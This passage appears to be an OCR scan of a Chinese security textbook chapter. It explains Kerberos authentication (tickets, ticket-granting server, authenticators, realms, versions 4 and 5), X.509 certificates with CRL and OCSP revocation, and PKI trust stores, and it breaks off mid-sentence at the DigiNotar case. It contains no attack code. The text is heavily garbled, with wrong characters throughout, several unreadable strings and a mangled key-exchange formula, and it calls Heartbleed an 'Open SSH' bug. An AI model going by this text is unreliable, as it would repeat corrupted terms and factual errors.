APPin / 服务 器 对 话 安 全 的 多 种 威胁 的 。 

它 的 基本 思想 非常 简单 。 在 一 个 不 受 保护 的 网 络 环境 中 ， 任 何 一 个 客户 端 可 以 使 用 任何 一 
台 服 务 器 提供 服务 。 很 明显 的 安全 性 风险 是 伪装 〈impersonation )。 政 手 可 以 装扮 成 另 一 个 客 
户 端 ， 并 在 服务 器 上 获得 没有 经 过 认证 的 权限 。 为 了 对 付 这 种 威胁 ， 服 务 需 必须 能 确认 请 求 服 
务 的 客户 端的 身份 。 每 个 服务 器 被 要 求 承 担 客户 端 /服务 器 每 次 交互 的 风险 ， 但 这 在 一 个 开放 
的 环境 中 ， 会 给 每 个 服务 器 造成 沉重 的 负担 。 一 个 替代 的 办 法 是 ， 使 用 一 个 认证 服务 器 (AS), 
它 知 道 所 有 用 户 的 口令 ， 并 把 它们 存储 在 一 个 集中 的 数据 库 中 。 然 后 用 户 就 可 以 登录 AS 进行 
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身份 验证 。 一旦 AS 验证 了 (verified) 用 户 的 身份 ， 它 可 以 把 这 个 信息 传送 到 一 个 应 用 服务 器 ， 
这 个 应 用 服务 器 就 将 接受 客户 端的 服务 请 求 。 

关键 问题 是 如 何在 一 种 安全 方式 下 完成 上 述 工 作 。 简 单 地 这 样 做 : 不 让 客户 端 在 网 络 上 
把 用 户口 令 发 送 到 AS， 因 为 敌手 可 以 在 网 络 上 观测 到 用 户 的 口令 ， 然 后 重用 该 口令 ; 不 让 
Kerberos 将 一 个 明文 消息 发 送 到 一 个 服务 器 验证 客户 端 身 份 ， 因 为 敌手 可 以 装扮 成 AS 并 发 送 
一 个 假 的 确认 信息 。 
”解决 这 个 问题 的 方式 是 使 用 加 密 手 段 和 一 个 完成 任务 ( 见 图 23-1) 的 消息 集合 。 
Kerberos 的 原始 版 本 中 ， 使 用 的 加 密 算法 是 数据 加 密 标准 (DES), 


2. AS 在 数据 库 中 检查 用 户 的 访问 权限 ， 
生成 票据 授予 票据 和 会 话 密 钥 。 用 由 
用 户口 令 派生 出 的 密 钥 加 密 结果 


每 当 用 户 登 录 会 话 时 
执行 一 次 








1. 用 户 登 录 工 作 站 ， 
并 请 求 主机 服务 








3. 工作 站 提示 用 户 输 4. TGS 解 密 票据 和 和 认证 符 ， 
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图 23-1 Kerberos 总 览 


AS 和 每 一 个 服务 需 共 享 一 个 唯一 的 安全 密 钥 。 密 钥 依据 物理 方式 或 其 他 安全 方式 分 发 。 
这 可 以 使 AS 能 够 以 一 种 安全 的 方式 把 消息 发 送 到 应 用 服务 器 。 首 先 ， 用 户 登 录 到 一 个 工作 站 
并 且 请 求 访 问 一 个 特定 的 服务 器 。 客 户 端 把 一 个 包含 用 户 ID 和 被 称 为 TGT ( Ticket-Granting 
Ticket， 票 据 授 予 票 据 ) 请 求 的 消息 发 送 到 AS。AS 在 它 的 数据 库 中 查找 这 个 用 户 的 口 邻 。 然 
后 AS 回复 一 个 TGT 和 一 个 称 为 会 话 密 钥 的 一 次 性 加 密 密 钥 。 这 两 个 加 密 都 使 用 用 户口 令 作 
为 加 密 密 钥 。 当 这 个 消息 返回 到 客户 端 时 ， 客 户 端 提示 用 户 输 入 他 的 口令 ,产生 密 钥 ， 并 试图 
解密 到 达 的 消息 。 如 果 提 供 了 正确 的 口令 ， 票 据 (ticket) 和 会 话 密 钥 就 会 成 功 地 被 恢复 。 

注意 这 其 中 发 生 了 什么 。 既然 用 户 知道 正确 的 口令 ，AS 就 能 验证 用 户 的 身份 ， 但 是 它 是 
以 口令 从 不 在 网 络 上 传送 的 方式 执行 的 。 此 外 ，AS 已 向 客户 端 发 送 了 信息 (该 信息 将 在 以 后 
向 服务 器 请 求 服务 时 要 用 到 )， 并 且 信 息 是 安全 的 ， 因 为 使 用 用 户 的 口令 对 其 进行 了 加 密 。 

票据 组 成 了 一 个 客户 端 用 来 请 求 服务 的 信任 证 书 〈credential) 的 集合 。 票 据 显 示 AS 已 经 
接受 了 这 个 客户 端 和 它 的 用 户 。 票 据 包含 用 户 ID 、 服 务 器 ID 、 一 个 时 间 惟 、 票 据 过 期 将 失效 
的 票据 生存 期 (lifetime)， 以 及 在 外 部 消息 中 发 送 到 客户 端的 一 个 相同 会 话 密 钥 的 副本 。 整 个 
票据 使 用 AS 和 服务 器 共享 的 DES 密 钥 加 密 。 因 此 没 人 可 以 使 用 票据 进行 欺骗 。 

现在 ，Kerberos 应 该 已 经 建立 起 来 ， 以 使 AS 能 发 回 一 个 票据 授予 访问 (Ticket-Granting 
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Access, TGA) 到 一 个 特定 的 应 用 服务 右 。 这 就 要 求 客 户 端 在 一 个 登录 会 话 期 间 为 用 户 想 要 使 
用 的 每 个 服务 从 AS 请 求 一 个 新 的 票据 。 请 求 新 票据 将 依次 要 求 AS 为 每 次 服务 请 求 查询 客户 
的 口令 ,或 者 也 将 口令 存储 在 内 存 中 以 供 登 录 会 话 期 间 使 用 。 第 一 个 过 程 对 用 户 来 说 是 困难 
的 ， 而 第 二 个 过 程 面临 着 安全 风险 。 因 此 ，AS 提供 一 个 票据 对 专门 的 应 用 服务 并 没有 什么 好 
处 ,但 是 对 一 个 专门 的 票据 授予 服务 器 ( Ticket-Granting Server, TGS) 却 是 有 好 处 的 。AS 给 
客户 闹 一 个 票据 ， 它 能 被 用 来 获得 更 多 的 票据 。 

想法 就 是 这 个 票据 可 以 让 客户 端 用 来 请 求 多 个 服务 授予 票据 。 所 以 票据 授予 票据 是 可 以 
再 度 使 用 的 。 然 而 我 们 不 希望 敌手 能 捕获 到 这 个 票据 并 使 用 它 。 考 虑 下 列 情节 : 一 个 敌手 捕获 
了 这 个 票据 ， 并 且 一 直 等 到 用 户 退出 工作 站 。 然 后 该 敌手 或 者 访问 工作 站 ， 或 者 把 自己 的 工作 
站 配置 成 受到 侵害 的 工作 站 的 网 络 地 址 。 接 下 来 敌手 就 能 重用 票据 去 欺骗 TGS。 为 了 应 对 这 
种 情况 ， 票 据 中 包含 了 一 个 时 间 戳 (表明 了 票据 发 行 的 日 期 和 时 间 ) 和 票据 生存 期 (表明 了 票 
据 有 效 的 时 间 长 度 ， 例 如 8 个 小 时 )。 这 样 ， 客 户 端 现在 就 有 了 一 个 可 重用 的 票据 ， 并 且 不 再 
需要 打扰 用 户 为 每 个 新 服务 请 求 都 提供 口令 了 。 最 后 注意 ， 票 据 授 予 票 据 是 用 一 个 仅 有 AS 和 
TGS 知道 的 密 钥 进行 加 密 的 。 这 可 防止 票据 被 更 改 。 票 据 是 使 用 基于 用 户口 令 的 密 钥 再 次 进 
行 加 密 的 ， 这 确保 了 提供 认证 的 票据 仅 能 由 正确 的 用 户 恢复 。 

让 我 们 看 看 这 是 如 何 工作 的 。 用 户 已 经 请 求 访问 服务 器 V。 客 户 端 代表 用 户 (C) 获得 了 一 
个 票据 授予 票据 和 一 个 临时 的 会 话 密 钥 。 客 户 端 然 后 向 TGS 发 送 一 个 消息 ， 为 用 户 X 请 求 一 个 
票据 ， 准 许 服 务 需 提供 服务 。 消 息 包括 服务 器 V 的 ID 和 一 个 票据 授予 票据 。TGS 解密 到 达 的 票据 
(注意 ， 票 据 是 经 过 加 密 的 ， 加 密 密 钥 只 有 AS 和 TGS AGA), 并 且 由 它 自己 的 了 D 验证 解密 是 否 成 功 。 
它 检 查 以 确保 生存 期 没有 过 期 。 然 后 通过 比较 到 达 信 息 的 用 户 ID 和 网 络 地 址 来 验证 用 户 。 

在 这 一 点 上 ，TGS 时 刻 准备 着 给 每 个 客户 端 一 个 服务 授予 票据 。 但 这 有 另外 一 个 威胁 需 
要 克服 。 问 题 的 核心 是 生存 期 与 票据 授予 票据 是 相关 联 的 。 如 果 生 存 期 非常 短 (例如 几 分 钟 )， 
那么 用 户 将 被 重复 地 索要 口令 。 如 果 生 存 期 长 (比如 多 个 小 时 )， 那 么 敌手 就 会 有 很 大 的 机 会 
进行 重 放 攻 击 。 敌 手 可 以 在 网 络 上 德 听 和 捕获 票据 授予 票据 的 备份 ， 并 且 一 直 等 到 合法 用 户 退 
出 。 然 后 敌手 可 以 伪造 合法 用 户 的 网 络 地 址 并 向 TGS 发 送 一 个 消息 。 这 将 使 敌手 能 不 受 限制 
地 访问 合法 用 户 才 能 使 用 的 资源 和 可 用 文件 。 

为 了 回避 这 个 问题 ，AS 为 客户 端 和 TGS 都 提供 一 个 它们 当前 正在 共享 的 会 话 密 钥 。 这 个 
会 话 密 钥 ， 回 想 一 下 ， 是 在 AS 发 往 客户 端的 消息 中 ， 它 使 用 用 户口 令 加 密 。 它 也 被 隐藏 在 票 
据 授予 票据 中 ,使 用 AS 和 TGS 共享 的 密 钥 进 行 加 密 。 在 向 TGS 请 求 一 个 服务 授予 票据 的 消 
妃 中 ， 客 户 端 包含 了 一 个 用 会 话 密 钥 加 密 的 认证 符 (authenticator)， 它 包括 用 户 的 ID 、 地 址 和 
一 个 时 间 戳 。 不 像 票 据 是 可 重用 的 ， 认 证 符 仅 能 被 使 用 一 次 并 且 有 效 期 非常 短 。 现 在 ，TGS 可 
以 使 用 它 和 AS 共享 的 密 钥 解密 票据 。 票 据 指 出 用 户 X 已 经 被 提供 了 会 话 密 钥 。 事 实 上 ， 票 据 
膏 :“ 使 用 这 个 会 话 密 钥 的 必须 是 X。”TGS 用 这 个 会 话 密 钥 解 密 认证 符 。 然 后 TGS 可 以 用 到 
达 消 息 的 票据 和 网 络 地 址 检查 来 自 认 证 符 的 名 字 和 地 址 。 如 果 所 有 的 都 匹配 ， 那么 TGS 确定 
票据 的 发 送 者 确实 是 票据 的 真实 拥有 者 。 事 实 上 就 是 ， 认 证 符 说 :“ 在 这 个 认证 符 的 使 用 时 间 
里 ， 我 因此 使 用 这 个 会 话 密 钥 。” 注意， 票据 不 能 证 明 任何 人 的 身份 ,但 是 它 是 一 种 安全 分 发 
密 钥 的 方式 。 证 明 客 户 端 身份 的 是 认证 符 。 由 于 认证 符 仅 能 使 用 一 次 并 且 生 存 期 也 非常 短 ， 这 
就 解除 了 天 手 甸 取 票据 和 认证 符 所 造成 的 威胁 。 如 果 客 户 端 想 要 为 一 个 新 的 服务 授予 票据 应 用 
TGS， 它 会 在 重用 的 票据 授予 票据 中 附加 一 个 新 的 认证 符 后 发 送 。 

在 协议 中 接 下 来 的 两 步 是 重复 最 后 两 个 过 程 。TGS 发 送 一 个 服务 授予 票据 和 一 个 新 的 会 
话 密 钥 到 客户 端 。 整 个 消息 使 用 旧 的 会 话 密 钥 进行 加 密 ， 使 得 仅 有 客户 端 可 以 恢复 消息 。 票 据 
使 用 仅 有 TGS 和 服务 器 V 可 以 共享 的 密 钥 加 密 。 客 户 端 现 在 有 了 一 个 对 服务 器 V 可 以 重用 的 
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服务 授予 票据 。 

每 次 用 户 想 要 使 用 服务 V， 客 户 端 可 以 发 送 这 个 附加 了 一 个 认证 符 的 票据 到 服务 器 V。 认 
证 符 使 用 新 的 会 话 密 钥 加 密 。 

如 果 需 要 相互 认证 ， 服 务 句 可 以 用 来 自 认 证 符 的 时 间 截 的 值 回复 ， 值 增加 1， 并 且 使 用 会 
话 密 钥 加 密 。 客 户 端 可 以 通过 解密 这 个 消息 来 恢复 增加 的 时 间 截 。 因 为 消息 是 由 会 话 密 钥 加 密 
的 ， 所 以 客户 端 就 可 以 确认 消息 仅 能 由 服务 器 V 来 创建 。 消 息 的 内 容 确保 C 不 是 一 个 旧 的 回 
复 的 重 放 。 

最 后 ， 这 个 过 程 的 结论 就 是 ， 客 户 端 和 服务 需 共 盏 一 个 密 钥 。 这 个 密 钥 能 被 用 来 加 密 将 在 
客户 病 和 服务 天 间 发 送 的 消息 ， 或 者 是 为 了 彼此 发 送 消息 而 交换 新 的 会 话 密 钥 所 发 送 的 消息 。 


23.1.2 Kerberos 域 和 多 Kerberi 


一 个 提供 全 套 服 务 的 Kerberos 环境 包括 一 台 Kerberos 服务 器 、 若 干 客户 端 和 若干 应 用 服 
务 人 器。 这 个 环境 有 如 下 要 求 : 

1. Kerberos 服务 天 的 数据 库 中 必须 存 有 所 有 参与 的 用 户 ID 和 口令 。 所 有 用 户 都 要 在 
Kerberos 服务 大 上 注册 。 

2. Kerberos 服务 硕 必 须 和 每 一 个 服务 需 共 享 一 个 秘密 密 钥 。 所 有 的 服务 需 都 要 在 Kerberos 
服务 器 上 注册 。 

这 种 环境 被 称 为 Kerberos 域 。 在 不 同 管理 组 织 下 的 客户 端 和 服务 器 的 网 络 通常 组 成 不 同 
的 域 ( 见 图 23-2 )。 也 就 是 说 ， 让 在 一 个 管理 域名 中 的 用 户 和 服务 器 在 其 他 地 方 的 Kerberos 服 
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图 23-2 请求 男 一 个 域 中 的 服务 
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务 胡 上 注册 通常 是 不 实用 的 ， 并 且 是 不 符合 管理 策略 的 。 然 而 在 一 个 域 中 的 用 户 也 许 需 要 访问 
男 一 个 域 中 的 服务 器 ， 而 且 一 些 服务 器 也 愿意 向 其 他 域 中 的 那些 经 过 认证 了 的 用 户 提 供 服 务 。 

Kerberos 提供 了 一 个 支持 域 间 认 证 (interrealm authentication) 的 机 制 。 对 两 个 支持 域 间 
认证 的 域 来 说 ， 在 每 个 互通 的 域 中 Kerberos 服务 器 和 在 另外 一 个 域 中 的 服务 器 共享 一 个 密 钥 。 
两 个 Kerberos 服务 器 可 以 互相 注册 。 

这 个 方案 要 求 ， 一 个 域 中 的 Kerberos 服务 器 需 信 任 另 一 个 域 中 的 Kerberos 服务 器 对 其 用 
户 进行 认证 。 此 外 ， 在 第 二 个 域 中 参与 的 服务 咒 也 必须 信任 在 第 一 个 域 中 的 Kerberos 服务 器 。 

有 了 以 上 这 些 基本 规则 ， 我 们 可 以 如 下 描述 这 个 机 制 〈 见 图 23-2 ) : 一 个 用 户 想 要 使 用 另 
一 个 域 中 的 服务 硕 提 供 的 服务 ， 就 需要 一 张 使 用 那个 服务 器 的 票据 。 用 户 的 客户 端 按 照 通 常 的 
程序 访问 本 地 的 TGS， 然后 为 一 个 远程 的 TGS (TGS 在 另外 一 个 域 中 ) 请 求 一 个 票据 授予 票 
据 。 接 下 来 ， 客 户 端 就 可 以 向 远程 TGS 请 求 一 张 在 该 远程 TGS 所 在 域 中 的 服务 器 的 服务 授予 

出 现在 远程 服务 带 的 票据 指出 了 用 户 最 初 被 认证 的 域 。 服 务 需 选择 是 否 允 许 远 程 请 求 。 

前 面 所 论述 的 方案 中 的 一 个 问题 是 ， 它 对 于 有 许多 域 的 情况 的 可 伸缩 性 不 好 。 如 果 有 N 
个 域 ， 那 么 就 必须 有 MN-1)/2 次 密 钥 交 换 来 使 得 每 个 Kerberos 域 可 以 和 其 他 任何 Kerberos 域 
进行 互 操 作 。 


23.1.3 版 本 4 和 版 本 5 


第 1 版 被 广泛 使 用 的 Kerberos 版 本 是 出 版 于 20 世纪 80 年 代 末 的 版 本 4。 改 进 和 扩展 版 
本 5 于 1993 年 推出 ， 并 于 2005 年 更 新 。Kerberos 版 本 5 现 已 广泛 实施 ， 包 括 作为 Microsoft 
的 Active Directory 服务 的 一 部 分 ， 在 大 多 数 当 前 的 UNIX 和 Linux 系统 中 ， 以 及 Apple 的 Mac 
OS X 中。 版 本 5 中 包含 了 对 版 本 4 的 许多 改进 。 首 先 ， 在 版 本 5 中 一 个 加 密 消 息 绑 定 一 个 加 
密 的 算法 标识 符 。 这 使 得 用 户 能 用 其 他 非 DES 的 算法 配置 Kerberos， 现 在 ， 使 用 高 级 加 密 标 
准 (AES) 是 默认 选择 。 

版 本 5 也 文 持 一 种 叫 作 认证 转发 (authentication forwarding) 的 技术 。 版 本 4 不 允许 将 发 
放 给 一 个 客户 疹 的 证 书 转发 给 其 他 主机 ， 并 由 其 他 客户 端 使 用 。 版 本 5 的 这 种 功能 可 以 使 得 一 
个 客户 闯 访 问 一 台 服 务 咒 ， 并 让 这 人 台 服 务 器 代表 该 客户 端 访问 另外 一 台 服 务 器 。 例 如 ， 一 个 客 
户 端 访问 一 个 打印 服务 器 ， 然 后 打印 服务 器 使 用 客户 端的 名 义 访 问 文件 服务 器 中 该 客户 端的 
文件 。 

最 后 ， 版 本 5 文 持 一 种 比 在 版 本 4 中 需要 更 少 的 安全 密 钥 交换 的 域 间 认证 办 法 。 


23.1.4 性 能 问题 


当 客 户 端 /服务 需 应 用 变 得 越 来 越 普 遍 ， 越 来 越 大 的 客户 端 /服务 器 装置 开始 出 现 。 可 能 
造成 的 情况 就 是 网 络 环境 规模 越 大 ， 登 录 认 证 就 越 重要 。 但 问题 是 ， 在 一 个 大 规模 环境 中 什么 
会 影响 Kerberos 的 性 能 呢 ? 

幸运 的 是 ， 如 果 系 统 配置 得 合适 ， 对 Kerberos 就 只 有 很 小 的 性 能 影响 。 谨 记 票 据 是 可 重 
用 的 。 因 此 ， 授 予 票据 请 求 对 流量 的 需求 是 有 限 的 。 至 于 登录 认证 票据 的 转移 ， 登 录 交 换 无 论 
如 何 都 必须 要 发 生 ， 因 此 额外 的 费用 也 是 有 限 的 。 

一 个 相关 的 问题 是 ，Kerberos 服务 占 应 用 是 否 需 求 一 个 专门 的 平台 ， 或 者 是 能 和 其 他 应 
用 共享 一 台 计 算 机 。 在 同一 台 机 需 上 运行 资源 敏感 的 应 用 服务 器 (例如 ， 数 据 库 服务 器 ) 和 
Kerberos 服务 器 可 能 是 不 明智 的 。 而 且 ， 只 有 当 Kerberos 服务 需 在 一 个 专门 的 、 隅 离 的 机 和 磺 上 
运行 时 ，Kerberos 的 安全 性 才能 得 到 最 好 的 保证 。 
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最 后 ， 在 一 个 大 系统 中 ， 为 保持 性 能 有 必要 用 到 多 域 吗 ?也 许 不 。 准 确 地 说 ， 采 用 多 域 的 
动机 是 管理 。 如 果 你 有 地 理 上 独立 的 机 带 徐 ,每 一 个 这 有 自己 的 管理 员 ， 那么 一 个 域 一 个 管理 
员 也 许 是 方便 的 。 然 而 ， 这 不 是 通常 的 情况 。 


23.2 X.509 


在 2.4 节 中 对 公 钥 证 书 做 了 简要 的 介绍 。 本 质 上 来 说 ， 一 个 证 书 由 一 个 公 钥 加 上 密 钥 所 
有 者 的 用 户 ID 组 成 ， 整 个 组 由 可 信和 的 第 三 方 签名 。 典 型 的 第 三 方 是 一 个 认证 中 心 〈 Certificate 
Authority，CA)， 它 是 受用 户 团体 信任 的 ， 如 政府 代理 机 构 、 金 融 机 构 、 电 信 公 司 或 者 其 他 可 
信 的 权威 组 织 。 用 户 可 以 向 认证 中 心 以 一 种 安全 的 方式 出 示 他 的 公 钥 并 获得 一 个 证 书 ， 然 后 用 
户 可 以 发 行 证 书 , 或 者 将 它 发 送 给 其 他 人 。 需 要 这 个 用 户 的 公 钥 的 任何 人 可 以 获得 证 书 并 且 通 
过 附加 可 信 的 签名 的 方式 来 进行 有 效 性 的 验证 ， 前 提 是 他 们 可 以 验证 CA 的 公 钥 。 图 2-8 给 出 
了 这 个 过 程 。 

X.509 ITU-T 标准 在 RFC 5280 ( Internet X.509 公 钥 基础 设施 证 书 和 证 书 吊销 列表 (CRL) 
配置 文件 ，2008 年 ) 中 有 详细 的 描述 ， 是 最 为 广泛 接受 的 公 和 钥 证 书 格 式 。X.509 证 书 被 用 于 
大 多 数 网 络 安全 应 用 ， 包 括 IP 安全 (IPSEC)、 安 全 套 接 字 层 ( SSL)、 安 全 传输 层 协议 (TLS), 
安全 电子 交易 (SET)、S/MIME， 以 及 电子 商务 应 用 。 

X.509 证 书包 括 图 23-3a 中 所 示 元 素 。 主 要 元 素 包 括 具 有 X.500 主体 名 称 的 密 钥 和 公 钥 信 
息 、 有 效 期 、CA 发 放 者 名 称 ， 以 及 将 这 些 信 息 绑 定 在 一 起 的 这 些 信 息 的 签名 。 当 前 X.509 证 
书 使 用 版 本 3 的 格式 ， 这 种 格式 包括 了 一 个 更 为 普遍 的 延展 机 制 ， 这 一 机 制 能 够 提供 更 多 的 
灵活 性 以 及 传递 特定 情形 所 需 的 信息 。 有 关 X.509 证 书 的 格式 和 组 成 元 素 的 更 多 信息 请 参见 
[STAL17]. 
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在 “基本 限制 ”(Basic Constraints) 集中 ， 有 一 个 重要 的 扩展 ， 用 于 说 明证 书 是 否 来 目 某 
个 CA。CA 证 书 仅仅 用 来 对 其 他 的 证 书 进行 签名 。 否 则 ,证书 则 属于 “终端 用 户 ”( 或 “终端 
实体 ”)， 并 可 用 来 检验 服务 器 或 客户 端的 身份 ， 对 电子 邮件 或 其 他 内 容 进 行 签 名 或 加 密 ， 对 可 
执行 代码 进行 签名 ， 或 用 于 其 他 前 面 我 们 列举 过 的 应 用 中 。 任 何 一 个 证 书 密 钥 的 用 途 ， 是 由 
“ 密 钥 用 途 ”( Key Usage) 和 “扩展 密 钥 用 途 ”( Extended Key Usage) 的 扩展 部 分 限定 的 ， 其 中 
规定 了 一 系列 被 认可 的 用 途 。 "终端 用 户 ” 证 书 不 允许 对 其 他 证 书 进行 签名 ， 除 了 下 文 将 要 讨 
论 的 关于 代理 证 书 (proxy-certificates) 的 特殊 情况 。 

上 述 讨论 的 CA 和 “终端 用 户 ” 证 书 是 X.509 证 书 的 最 为 常见 的 形式 。 然 而 也 存在 一 些 特 
殊 的 变 体 ， 它 们 是 按 特定 元 素 值 或 某 些 扩展 进行 划分 的 。 变 体 包 括 : 

e 传统 (长 效 ) 证 书 (conventional (long-lived) certificate); 是 上 述 讨论 过 的 CA 和 “终端 

用 户 ” 证 书 。 它 们 的 有 效 期 通常 从 几 个 月 到 几 年 。 

© 短 效 证 书 ( short-lived certificate): 用 来 对 应 用 进行 认证 ， 如 网 格 计算 ( grid computing), 
从 而 避免 了 传统 证 书 的 一 些 开销 和 限制 [HSU98]。 它 们 的 有 效 期 从 几 个 小 时 到 几 天 ， 
如 果 有 威胁 ， 这 将 缩短 误 用 时 间 。 因 为 它们 通常 不 是 由 公认 的 机 构 颁 发 的 ， 其 中 还 存 
在 在 证 书 颁发 组 织 之 外 对 证 书 进行 验证 的 问题 。 

e 代理 证 书 ( proxy certificate): 现 被 广泛 用 于 为 应 用 提供 认证 ， 例 如 网 格 计算 ， 从 而 殉 
服 了 短 效 证 书 的 一 些 局 限 。 代 理 证 书 被 定义 在 RFC 3820 ( Internet X.509 公 铀 基础 设施 
(PKI) 代理 证 书 配置 文件 ，2004 年 ) 中 ,通过 “代理 证 书 ” 扩 展 的 存在 与 否 进行 识别 。 
它们 允许 “终端 用 户 ” 证 书 对 其 他 证 书 进行 签名 ， 这 必须 是 包含 它们 身份 、 有 效 期 和 
授权 子 集 的 已 有 证 书 的 一 个 扩展 。 它 们 允许 用 户 在 某 些 环境 下 轻易 地 创建 一 个 访问 资 
源 的 凭证 (credential)， 访 问 这 些 资 源 并 不 需要 提供 全 部 的 证 书 和 权限 。 其 他 建议 是 ， 
使 用 代理 证 书 作为 网 络 访问 能 力 的 票据 ， 以 便 授权 用 户 以 特定 的 权限 访问 特定 的 服务 。 

o 属性 证 书 ( attribute certificate): 使 用 了 一 个 不 同 的 证 书 格式 ， 定 义 于 RFC 5755 (授权 
的 Internet 属性 证 书 配置 文件 ，2010 年 ) 中 ， 将 用 户 的 身份 与 一 系列 属性 结合 ， 这 些 属 
性 通常 被 用 于 授权 和 访问 控制 。 用 户 可 以 拥有 一 些 不 同 的 属性 证 书 ， 不 同 的 目的 对 应 
不 同 的 属性 集合 ， 且 与 主要 的 传统 证 书 相 联系 。 这 些 属 性 被 定义 在 “属性 ”(Attributes ) 
扩展 中 。 这 些 扩 展 也 可 被 包含 在 传统 证 书 中 ， 但 我 们 并 不 鼓励 这 种 做 法 ， 因 为 这 将 变 
得 太 不 灵活 。 这 些 扩 展 也 可 能 包含 于 代理 证 书 中 ， 用 于 进一步 限制 其 使 用 ， 这 对 于 一 
些 应 用 是 合适 的 。 

在 使 用 任何 证 书 之 前 ， 应 用 必须 检查 其 有 效 性 ， 并 保证 其 到 期 前 不 会 被 吊销 。 如 果 因 为 密 
钥 已 经 受到 威胁 或 者 因为 用 户 软 件 需要 升级 需要 产生 新 的 密 钥 ， 用 户 希望 取消 密 钥 时 ， 上 述 情 
况 就 会 出 现 。 

X.509 标准 定义 了 一 个 证 书 吊销 列表 (CRL)， 是 由 颁发 者 签名 的 ， 其 中 包含 的 要 素 如 图 23-3b 
所 示 。 每 一 个 被 吊销 的 证 书记 录 都 包含 了 证 书 的 序列 号 和 证 书 吊销 日 期 。CA 颁发 的 证 书 序列 
号 是 唯一 的 ， 足 以 识别 证 书 。 当 一 个 应 用 接收 了 一 个 证 书 ，X.509 标准 声明 应 用 应 该 在 签发 证 
书 的 CA 的 当前 的 CRL 中 确认 证 书 是 否 已 被 吊销 。 然 而 ， 因 检索 和 存储 这 些 列表 的 开销 原因 ， 
很 少 的 应 用 这 样 做 。“ 最 近 的 Heartbleed Open SSH 的 bug, SRIT MIAME SKM IRS ZEUE 
书 ， 这 很 大 程度 上 凸显 了 CRL 使 用 中 存在 的 缺陷 。” 

更 实用 的 另 一 个 方法 ， 是 使 用 在 线 证 书 状态 协议 (Online Certificate Status Protocol) [A] CA 
请 求 查 询 关 于 某 一 特定 的 证 书 是 否 有 效 。 这 一 轻 量 级 的 协议 在 RFC 6960 ( X.509 Internet 244 
基础 设施 在 线 证 书 状 态 协 议 一 一 OCSP，2013 年 ) 中 被 定义 ， 并 被 越 来 越 多 地 使 用 ， 许 多 最 向 
见 的 Web 浏览 器 的 近期 版 本 使 用 了 这 一 方法 。 如 果 证 书签 发 CA (signing CA) 文 持 这 一 协议 ， 
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则 证 书 中 的 权威 信息 访问 (Authority Information Access) 扩展 可 指定 OCSP 服务 器 的 地 址 以 供 
使 用 。 

许多 旧版 本 的 X.509 证 书 用 MDS 散 列 值 对 其 内 容 进 行 签名 。 不 幸 的 是 ， 关 于 产生 MDS 
冲突 的 研究 进展 ， 导 致 了 为 不 同 身份 用 相同 散 列 值 伪造 新 证 书 的 一 些 技术 的 发 展 ， 因 此 能 够 重 
用 相同 的 签名 作为 合法 有 效 的 证 书 [STEV07]。Flame 恶意 软件 的 作者 就 使 用 了 这 一 方法 伪造 
出 看 似 合法 有 效 的 微软 代码 签名 (Microsoft code-signing) 证 书 。 这 使 得 此 恶意 软件 在 超过 两 
年 的 时 间 内 都 没有 被 发 现 ， 直 到 2012 年 才 被 检测 出 。 在 21 世纪 初期 ，MD5 的 使 用 价值 降低 ， 
SHA-1 哈 希 算法 被 推荐 使 用 。 然 而 ，2017 年 创建 的 SHA-1 冲突 则 意味 着 该 算法 不 再 被 认为 是 
REN. RE 2017 FH, 大 多 数 浏览 硕 现在 拒绝 使 用 SHA-1 或 MD5 证 书 。 目 前 的 要 求 是 在 
证 书 中 使 用 SHA-2 哈 希 算法 之 一 ，SHA-3 很 快 就 可 以 成 为 蔡 代 方案 。 


23.3 AAE MIZE 


RFC 4949 (Internet 安全 术语 (版 本 2 )，2007 年 ) 将 公 钥 基础 设施 (Public-Key Infrastru- 
cture, PKI) 定义 为 基于 非 对 称 密码 体制 ， 用 来 生成 、 管 理 、 存 储 、 分 配 和 撤销 数字 证 书 的 一 
套 硬 件 、 软 件 、 人 员 、 策 略 和 过 程 。 开 发 一 个 PKI 的 主要 目标 是 使 安全 、 方 便 和 高 效 获取 公 
钥 成 为 可 能 。 

为 验证 一 个 证 书 ， 你 应 当知 道 签 发 CA (signing CA) 的 公 钥 。 这 可 能 相应 地 由 另 一 个 
证 书 提 供 ， 并 被 一 个 父 CA (parent CA) 签名 ， 因 为 CA 按 层次 进行 组 织 。 最 终 ， 无 论 如 何 ， 
你 必 将 追溯 到 最 高 层 ， 并 具有 根 CA (root CA) 公 钥 的 一 个 副本 。X.509 标准 在 对 PKI 模型 
进行 描述 时 ， 最 初 假设 存在 一 个 具有 固定 层 的 、 国 际 公 认 的 、 由 政府 管理 的 CA。 但 这 并 未 
实现 。 而 当前 的 X.509 实现 是 由 一 个 庞大 的 CA 列表 及 其 公 钥 构成 的 ， 就 是 已 知 的 “可 信 存 
WE” (trust store)。 通 常情 况 下 ， 这 些 CA 要 么 直接 签发 “终端 用 户 ” 证 书 ， 要 么 就 为 一 小 
部 分 中 间 CA (Intermediate-CA) 依次 签发 证 书 ， 这 些 中 间 CA 会 转 而 为 “终端 用 户 ” 签 发 
证 书 。 因 此 ， 所 有 的 层 数 都 是 非 稼 少 的 ， 并 且 能 够 同等 信任 。 用 户 和 服务 需 藻 想 要 获得 自动 
验证 的 证 书 ， 就 必须 从 这 些 CA 中 的 某 一 个 CA 获取 。 另 外 ,它们 可 以 使 用 “ 自 签名 ”( self- 
signed) 证 书 或 者 使 用 由 其 他 CA 签发 的 证 书 。 但 是 ,无 论 哪 种 情形 ， 这 些 证 书 最 初 都 会 被 认 
为 是 “不 可 信 的 "， 并 且 用 户 都 会 收 到 一 个 有 关 接 受 这 类 证 书 的 严重 警告 ， 即 使 这 些 证 书 实 
际 上 是 合法 的 。 

这 一 PKI 模型 存在 诸多 的 问题 ， 这 也 是 多 年 前 被 知晓 的 [GUTM02]、[GRUS13]。 而 当前 
的 实现 也 颇 受 诉 病 。 首 先 就 是 验证 证 书 时 若 出 现 问题 ， 需 依赖 用 户 做 出 合理 决定 。 不 垃 的 是 ， 
很 明显 ， 大 多 数 用 户 并 不 知道 什么 是 证 书 以 及 为 什么 会 存在 问题 。 因 此 ， 他 们 选择 接受 或 拒绝 
这 一 证 书 时 ， 其 实 对 安全 了 解 甚 少 ， 这 就 可 能 导致 对 其 系统 的 损害 。 

男 一 个 至 关 重 要 的 问题 就 是 假设 可 信和 存储 库 ( trust store) 的 所 有 CA 都 是 被 同等 信任 的 、 
同等 良好 管理 的 ， 采用 同等 安全 策略 的 。 一 个 强 有 力 的 例证 就 是 2011 年 DigiNotar CA 遭受 的 
